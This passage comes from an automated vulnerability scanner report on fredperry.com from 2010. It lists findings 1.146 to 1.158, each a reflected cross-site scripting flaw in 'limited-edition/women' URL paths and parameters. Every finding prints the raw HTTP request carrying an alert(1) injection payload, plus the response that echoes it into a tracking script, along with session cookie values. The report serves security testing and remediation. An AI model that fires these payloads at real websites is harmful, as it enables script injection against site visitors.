Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=gcvi3fem1mhrbria50s6acuvk1; expires=Tue, 09-Nov-2010 17:12:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/?58d36"-alert(1)-"7c51ba12963=1");
//]]>
...[SNIP]...

1.146. http://www.fredperry.com/limited-edition/women/accessories/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/accessories/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d54c5"-alert(1)-"13b1baf7e25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editiond54c5"-alert(1)-"13b1baf7e25/women/accessories/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=0tposdlgclqd1h58brr6uk20h6; expires=Tue, 09-Nov-2010 17:20:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editiond54c5"-alert(1)-"13b1baf7e25/women/accessories/");
//]]>
...[SNIP]...

1.147. http://www.fredperry.com/limited-edition/women/accessories/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/accessories/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58f2e"-alert(1)-"049337dcf29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women58f2e"-alert(1)-"049337dcf29/accessories/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=73thgc0j921t9c0heu3odub2g1; expires=Tue, 09-Nov-2010 17:20:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women58f2e"-alert(1)-"049337dcf29/accessories/");
//]]>
...[SNIP]...

1.148. http://www.fredperry.com/limited-edition/women/accessories/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/accessories/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6a85"-alert(1)-"300d6ce8743 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/accessoriese6a85"-alert(1)-"300d6ce8743/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=s5epv4r4i2sttp44o9n4suh513; expires=Tue, 09-Nov-2010 17:21:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/accessoriese6a85"-alert(1)-"300d6ce8743/");
//]]>
...[SNIP]...

1.149. http://www.fredperry.com/limited-edition/women/accessories/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/accessories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31709"-alert(1)-"d269657da44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/accessories/?31709"-alert(1)-"d269657da44=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hr77dp20kva6vnl2ndq6nniuq1; expires=Tue, 09-Nov-2010 17:18:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/accessories/?31709"-alert(1)-"d269657da44=1");
//]]>
...[SNIP]...

1.150. http://www.fredperry.com/limited-edition/women/bags/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/bags/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a422"-alert(1)-"8f681c0c66b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition1a422"-alert(1)-"8f681c0c66b/women/bags/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ta15vgogrnorgonqfudmjnrj76; expires=Tue, 09-Nov-2010 17:14:58 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition1a422"-alert(1)-"8f681c0c66b/women/bags/");
//]]>
...[SNIP]...

1.151. http://www.fredperry.com/limited-edition/women/bags/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/bags/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6b43"-alert(1)-"406580c4491 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womena6b43"-alert(1)-"406580c4491/bags/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sdbh97r4md7k7ln26gr9jls147; expires=Tue, 09-Nov-2010 17:15:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womena6b43"-alert(1)-"406580c4491/bags/");
//]]>
...[SNIP]...

1.152. http://www.fredperry.com/limited-edition/women/bags/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/bags/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dba45"-alert(1)-"8611336e635 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/bagsdba45"-alert(1)-"8611336e635/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=79culemoq5vvafjn57qrqbp0k5; expires=Tue, 09-Nov-2010 17:15:56 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/bagsdba45"-alert(1)-"8611336e635/");
//]]>
...[SNIP]...

1.153. http://www.fredperry.com/limited-edition/women/bags/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/bags/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a888"-alert(1)-"e9449111db7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/bags/?1a888"-alert(1)-"e9449111db7=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=mb2m8bt9ennbk1klnk1ot8qpf5; expires=Tue, 09-Nov-2010 17:14:17 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/bags/?1a888"-alert(1)-"e9449111db7=1");
//]]>
...[SNIP]...

1.154. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/blank-canvas-ann-sofie-back/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cc77"-alert(1)-"8df6d5753ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition9cc77"-alert(1)-"8df6d5753ab/women/blank-canvas-ann-sofie-back/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9c63vhna60h3f9d7p0flptleo4; expires=Tue, 09-Nov-2010 17:15:13 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition9cc77"-alert(1)-"8df6d5753ab/women/blank-canvas-ann-sofie-back/");
//]]>
...[SNIP]...

1.155. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/blank-canvas-ann-sofie-back/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb8ab"-alert(1)-"d3b4f2c0bac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womenfb8ab"-alert(1)-"d3b4f2c0bac/blank-canvas-ann-sofie-back/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qjpnguf6q36k2ksu35vp7htro0; expires=Tue, 09-Nov-2010 17:15:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womenfb8ab"-alert(1)-"d3b4f2c0bac/blank-canvas-ann-sofie-back/");
//]]>
...[SNIP]...

1.156. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/blank-canvas-ann-sofie-back/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36cd8"-alert(1)-"8e2713d7551 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/blank-canvas-ann-sofie-back36cd8"-alert(1)-"8e2713d7551/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:16:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=5qbk7rak06nsao4tonccqlbgd3; expires=Tue, 09-Nov-2010 17:16:01 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/blank-canvas-ann-sofie-back36cd8"-alert(1)-"8e2713d7551/");
//]]>
...[SNIP]...

1.157. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/blank-canvas-ann-sofie-back/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d28b"-alert(1)-"4759f050573 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/blank-canvas-ann-sofie-back/?4d28b"-alert(1)-"4759f050573=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ksf7oqbfqpoiif7p6bjfjpq1i3; expires=Tue, 09-Nov-2010 17:14:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Ann-Sof
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/blank-canvas-ann-sofie-back/?4d28b"-alert(1)-"4759f050573=1");
//]]>
...[SNIP]...

1.158. http://www.fredperry.com/limited-edition/women/collaboration/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/collaboration/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 138a5"-alert(1)-"4cb6177581 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition138a5"-alert(1)-"4cb6177581/women/collaboration/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
